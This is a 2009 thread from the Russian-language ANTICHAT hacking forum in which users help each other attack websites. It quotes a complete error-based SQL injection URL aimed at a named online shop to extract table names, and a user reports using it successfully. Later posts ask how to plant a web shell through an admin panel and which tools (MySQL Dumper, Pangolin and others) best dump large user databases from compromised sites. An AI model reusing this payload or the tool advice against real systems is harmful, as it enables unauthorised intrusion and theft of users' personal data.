ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.11.2009, 13:37
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Сообщение от ElteRUS
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
понятно..всем спасибо, будем пополнять багаж знаний
|
|
|
26.11.2009, 23:08
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541
Репутация:
214
|
|
Сообщение от ElteRUS
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
тут как я понял name_const
для этого дела заюзал
https://forum.antichat.ru/thread148915.html
помогло.результат был получен.
Спасибо Pashkela
|
|
|
|
26.11.2009, 10:22
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от svesve
Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
http://sql-ex.ru/help/
|
|
|
|
26.11.2009, 18:38
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
как залить шелл имея доступ в админку. Есть ли универсальный способ заливки, т.е не зная на чем сайт работает,заливать. Какой сейчас лучше всего юзать для дампа большого количества юзеров из БД?
|
|
|
|
26.11.2009, 20:31
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от jecka3000
как залить шелл имея доступ в админку. Есть ли универсальный способ заливки, т.е не зная на чем сайт работает,заливать.
Нет. Для каждого самописного двига - свой подход, и не факт.
Сообщение от jecka3000
Какой сейчас лучше всего юзать для дампа большого количества юзеров из БД?
Google.com -> MySQL Dumper
|
|
|
|
26.11.2009, 20:59
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
mailbrush, с шеллами понятно, а вот на счет дамперов. Впринципе я раньше юзал SQLHelper, но последнее время он перестал дампить большие БД юзеров или пропускает очень много, к тому же не воспринимает некоторые символы. Есть ли ему альтернатива? Или может быть есть какя то софтина,наподобие той функции, которая есть в SQLHelper ("Dump now").
П.С. Хотел найти не пхп скрипт, а именно exe
|
|
|
|
26.11.2009, 21:05
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от jecka3000
mailbrush, с шеллами понятно, а вот на счет дамперов. Впринципе я раньше юзал SQLHelper, но последнее время он перестал дампить большие БД юзеров или пропускает очень много, к тому же не воспринимает некоторые символы. Есть ли ему альтернатива? Или может быть есть какя то софтина,наподобие той функции, которая есть в SQLHelper ("Dump now").
П.С. Хотел найти не пхп скрипт, а именно exe
ня http://c0li.wordpress.com/2009/10/04/simple-sqli-dumper-ssdp-v0-1-gui/
мне нрявится 
|
|
|
|
26.11.2009, 21:30
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
LzD, все равно большую базу сдампить не может(
302:301) No data. Operation halted !!!
|
|
|
|
26.11.2009, 21:33
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от jecka3000
LzD, все равно большую базу сдампить не может(
pangolin пробуй
|
|
|
|
26.11.2009, 21:58
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
LzD, походу у меня вариант остался только руками)))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
